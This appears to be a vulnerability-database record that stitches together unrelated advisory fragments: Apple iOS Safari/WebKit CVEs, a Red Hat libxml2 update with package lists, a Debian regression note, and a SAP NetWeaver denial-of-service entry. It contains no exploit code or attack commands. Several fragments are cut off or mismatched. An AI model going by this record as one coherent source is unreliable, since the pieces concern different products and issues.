https://twitter.com/VMwareSRC
Copyright 2015 VMware Inc. All rights reserved.
CVE-ID
CVE-2015-5746 : evad3rs, TaiG Jailbreak Team
Air Traffic
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: AirTraffic may have allowed access to protected parts of the
filesystem
Description: A path traversal issue existed in asset handling.
CVE-ID
CVE-2015-5773 : Apple
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may lead to user interface
spoofing
Description: A malicious website could open another site and prompt
for user input without a way for the user to tell where the prompt
originated.
CVE-ID
CVE-2015-3729 : Code Audit Labs of VulnHunt.com
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious website may trigger an infinite number of alert
messages
Description: An issue existed where a malicious or hacked website
could show infinite alert messages and make users believe their
browser was locked.
CVE-ID
CVE-2015-3730 : Apple
CVE-2015-3731 : Apple
CVE-2015-3732 : Apple
CVE-2015-3733 : Apple
CVE-2015-3734 : Apple
CVE-2015-3735 : Apple
CVE-2015-3736 : Apple
CVE-2015-3737 : Apple
CVE-2015-3738 : Apple
CVE-2015-3739 : Apple
CVE-2015-3740 : Apple
CVE-2015-3741 : Apple
CVE-2015-3742 : Apple
CVE-2015-3743 : Apple
CVE-2015-3744 : Apple
CVE-2015-3745 : Apple
CVE-2015-3746 : Apple
CVE-2015-3747 : Apple
CVE-2015-3748 : Apple
CVE-2015-3749 : Apple
Web
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may lead to user interface
spoofing
Description: Navigating to a malformed URL may have allowed a
malicious website to display an arbitrary URL.
CVE-ID
CVE-2015-3755 : xisigr of Tencent's Xuanwu Lab
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious website may exfiltrate image data cross-origin
Description: Images fetched through URLs that redirected to a
data:image resource could have been exfiltrated cross-origin.
CVE-ID
CVE-2015-3753 : Antonio Sanso and Damien Antipa of Adobe
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious website can trigger plaintext requests to an
origin under HTTP Strict Transport Security
Description: An issue existed where Content Security Policy report
requests would not honor HTTP Strict Transport Security (HSTS).
CVE-ID
CVE-2015-3750 : Muneaki Nishimura (nishimunea)
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious website can make a tap event produce a synthetic
click on another page
Description: An issue existed in how synthetic clicks are generated
from tap events that could cause clicks to target other pages.
CVE-ID
CVE-2015-5759 : Phillip Moon and Matt Weston of Sandfield
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Content Security Policy report requests may leak cookies
Description: Two issues existed in how cookies were added to Content
Security Policy report requests. Cookies were sent in cross-origin
report requests in violation of the standard. Cookies set during
regular browsing were sent in private browsing.
CVE-ID
CVE-2015-3752 : Muneaki Nishimura (nishimunea)
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Image loading may violate a website's Content Security
Policy directive
Description: An issue existed where websites with video controls
would load images nested in object elements in violation of the
website's Content Security Policy directive.
CVE-ID
CVE-2015-3751 : Muneaki Nishimura (nishimunea)
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update
Advisory ID: RHSA-2014:1655-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1655.html
Issue date: 2014-10-16
CVE Names: CVE-2014-3660
=====================================================================
1. Summary:
Updated libxml2 packages that fix one security issue are now available for
Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The libxml2 library is a development toolbox providing the implementation
of various XML standards.
A denial of service flaw was found in libxml2, a library providing support
to read, modify and write XML and HTML files. (CVE-2014-3660)
All libxml2 users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. The desktop must be
restarted (log out, then log back in) for this update to take effect.
4.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
libxml2-2.7.6-17.el6_6.1.src.rpm
i386:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-python-2.7.6-17.el6_6.1.i686.rpm
x86_64:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-python-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-static-2.7.6-17.el6_6.1.i686.rpm
x86_64:
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-static-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
libxml2-2.7.6-17.el6_6.1.src.rpm
x86_64:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-python-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-static-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
libxml2-2.7.6-17.el6_6.1.src.rpm
i386:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-python-2.7.6-17.el6_6.1.i686.rpm
ppc64:
libxml2-2.7.6-17.el6_6.1.ppc.rpm
libxml2-2.7.6-17.el6_6.1.ppc64.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.ppc.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.ppc64.rpm
libxml2-devel-2.7.6-17.el6_6.1.ppc.rpm
libxml2-devel-2.7.6-17.el6_6.1.ppc64.rpm
libxml2-python-2.7.6-17.el6_6.1.ppc64.rpm
s390x:
libxml2-2.7.6-17.el6_6.1.s390.rpm
libxml2-2.7.6-17.el6_6.1.s390x.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.s390.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.s390x.rpm
libxml2-devel-2.7.6-17.el6_6.1.s390.rpm
libxml2-devel-2.7.6-17.el6_6.1.s390x.rpm
libxml2-python-2.7.6-17.el6_6.1.s390x.rpm
x86_64:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-python-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-static-2.7.6-17.el6_6.1.i686.rpm
ppc64:
libxml2-debuginfo-2.7.6-17.el6_6.1.ppc64.rpm
libxml2-static-2.7.6-17.el6_6.1.ppc64.rpm
s390x:
libxml2-debuginfo-2.7.6-17.el6_6.1.s390x.rpm
libxml2-static-2.7.6-17.el6_6.1.s390x.rpm
x86_64:
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-static-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
libxml2-2.7.6-17.el6_6.1.src.rpm
i386:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-python-2.7.6-17.el6_6.1.i686.rpm
x86_64:
libxml2-2.7.6-17.el6_6.1.i686.rpm
libxml2-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-devel-2.7.6-17.el6_6.1.i686.rpm
libxml2-devel-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-python-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
libxml2-debuginfo-2.7.6-17.el6_6.1.i686.rpm
libxml2-static-2.7.6-17.el6_6.1.i686.rpm
x86_64:
libxml2-debuginfo-2.7.6-17.el6_6.1.x86_64.rpm
libxml2-static-2.7.6-17.el6_6.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
libxml2-2.9.1-5.el7_0.1.src.rpm
x86_64:
libxml2-2.9.1-5.el7_0.1.i686.rpm
libxml2-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-python-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-devel-2.9.1-5.el7_0.1.i686.rpm
libxml2-devel-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-static-2.9.1-5.el7_0.1.i686.rpm
libxml2-static-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
libxml2-2.9.1-5.el7_0.1.src.rpm
x86_64:
libxml2-2.9.1-5.el7_0.1.i686.rpm
libxml2-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-python-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-devel-2.9.1-5.el7_0.1.i686.rpm
libxml2-devel-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-static-2.9.1-5.el7_0.1.i686.rpm
libxml2-static-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
libxml2-2.9.1-5.el7_0.1.src.rpm
ppc64:
libxml2-2.9.1-5.el7_0.1.ppc.rpm
libxml2-2.9.1-5.el7_0.1.ppc64.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.ppc.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.ppc64.rpm
libxml2-devel-2.9.1-5.el7_0.1.ppc.rpm
libxml2-devel-2.9.1-5.el7_0.1.ppc64.rpm
libxml2-python-2.9.1-5.el7_0.1.ppc64.rpm
s390x:
libxml2-2.9.1-5.el7_0.1.s390.rpm
libxml2-2.9.1-5.el7_0.1.s390x.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.s390.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.s390x.rpm
libxml2-devel-2.9.1-5.el7_0.1.s390.rpm
libxml2-devel-2.9.1-5.el7_0.1.s390x.rpm
libxml2-python-2.9.1-5.el7_0.1.s390x.rpm
x86_64:
libxml2-2.9.1-5.el7_0.1.i686.rpm
libxml2-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-devel-2.9.1-5.el7_0.1.i686.rpm
libxml2-devel-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-python-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
libxml2-debuginfo-2.9.1-5.el7_0.1.ppc.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.ppc64.rpm
libxml2-static-2.9.1-5.el7_0.1.ppc.rpm
libxml2-static-2.9.1-5.el7_0.1.ppc64.rpm
s390x:
libxml2-debuginfo-2.9.1-5.el7_0.1.s390.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.s390x.rpm
libxml2-static-2.9.1-5.el7_0.1.s390.rpm
libxml2-static-2.9.1-5.el7_0.1.s390x.rpm
x86_64:
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-static-2.9.1-5.el7_0.1.i686.rpm
libxml2-static-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
libxml2-2.9.1-5.el7_0.1.src.rpm
x86_64:
libxml2-2.9.1-5.el7_0.1.i686.rpm
libxml2-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-devel-2.9.1-5.el7_0.1.i686.rpm
libxml2-devel-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-python-2.9.1-5.el7_0.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
libxml2-debuginfo-2.9.1-5.el7_0.1.i686.rpm
libxml2-debuginfo-2.9.1-5.el7_0.1.x86_64.rpm
libxml2-static-2.9.1-5.el7_0.1.i686.rpm
libxml2-static-2.9.1-5.el7_0.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-3660.html
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
In addition, this update addresses a regression introduced in DSA 3057 by
the patch fixing CVE-2014-3660. This caused libxml2 to not parse an
entity when it's used first in another entity referenced from an
attribute value.
For the stable distribution (wheezy), these problems have been fixed in
version 2.8.0+dfsg1-7+wheezy3.
For the upcoming stable distribution (jessie), these problems have been
fixed in version 2.9.1+dfsg1-4.
For the unstable distribution (sid), these problems have been fixed in
version 2.9.1+dfsg1-4
| VAR-201411-0223 | CVE-2014-8592 | SAP NetWeaver Used in SAP Host Agent Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request. SAP NetWeaver is prone to multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to exhaust available CPU and memory resources, denying service to legitimate users
SAP NetWeaver 7.02, and 7.30 are vulnerable; other versions may also be affected